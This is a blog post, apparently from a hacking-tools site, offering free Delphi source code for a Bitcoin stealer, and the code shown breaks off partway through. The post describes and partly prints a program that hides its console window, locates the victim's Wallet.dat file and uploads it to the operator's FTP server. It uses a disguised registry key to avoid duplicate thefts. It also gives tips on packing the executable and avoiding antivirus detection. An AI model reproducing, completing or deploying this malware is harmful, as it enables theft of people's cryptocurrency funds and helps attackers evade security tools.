Bitcoin Wallet dat FTP Stealer Source

Exclusive Hacking Tools Library

For the new year, here is our gift ! A free and open-source Bitcoin stealer, coded in Delphi by Jimmy (myself).

This is a console application. The engine will try to locate the "Wallet.dat" file and upload it on a FTP server. The source-code if fully commented. You have just 4 lines to customize with your FTP infos. This application uses Indy FTP component to proceed the upload.

To avoid useless duplicate Wallet on your FTP, this application will add a key in the registry after first upload. At the next launch, the application will check if the key already exists. And if yes, it will not try to steal the Wallet. It's simple and working !

Packed with PECompact, the final EXE is around 190KB.
EXE without runtime packages is only 19KB and flagged 1/33 :

DO NOT SCAN YOUR EXE USING VIRUS-TOTAL (prefer )

Merry christmas & Happy new year :)

Save the code below in a file named "dbs.dpr" :

program dbs; // Bitcoin Stealer // developed by Jimmy // for CompilerVersion >= 21.0} {$WEAKLINKRTTI ON} {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])} {$IFEND} uses Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry; // Function to set the window state hidden function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow'; // Function to get the AppData path function AppDataPath: String; const SHGFP_TYPE_CURRENT = 0; var Path: array [0 .. MAXCHAR] of char; begin SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @Path[0]); Result := StrPas(Path); end; // Function to check a file size function FileSize(FileName: wideString): Int64; var sr: TSearchRec; begin if FindFirst(FileName, faAnyFile, sr) = 0 then Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow) else Result := -1; FindClose(sr); end; // Function to generate random string function RandomString(PLen: Integer): string; var str: string; begin Randomize; str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; Result := ''; repeat Result := Result + str[Random(Length(str)) + 1]; until (Length(Result) = PLen); end; // ============================================================================ var Debug: Boolean; FTP: TIdFTP; REG: TRegIniFile; RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String; Error: String; begin // The window should be hidden without using this API ShowWindow(GetConsoleWindow, SW_HIDE); // Debug or build release ? Debug := True; // Set registry key value (random) RegValue := '6556'; // At the end of the first execution we will write a key in the registry. // Now we will try check if the key exists. If yes, it means // that the wallet has already be stolen. Avoid useless duplicates. try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKeyReadOnly('Software'); RegCurrentValue := REG.ReadString('Google', 'Version', ''); REG.CloseKey; REG.Free; except end; // Check if wallet has been already stolen (to avoid duplicates) if not(RegCurrentValue = RegValue) then begin try // Generate path to Bitcoin wallet file if Win32MajorVersion >= 6 then // Microsoft Windows Vista and newer Path := ExpandFileName(AppDataPath...

Source: exclusivehackingtools.blogspot.com June 3, 2014 – 05:57

Related Posts

Bitcoin wallet brute force

Bitcoin wallet Android open source

Bitcoin wallet Stealer source code

Bitcoin wallet dat Stealer

Bitcoin wallet.dat file size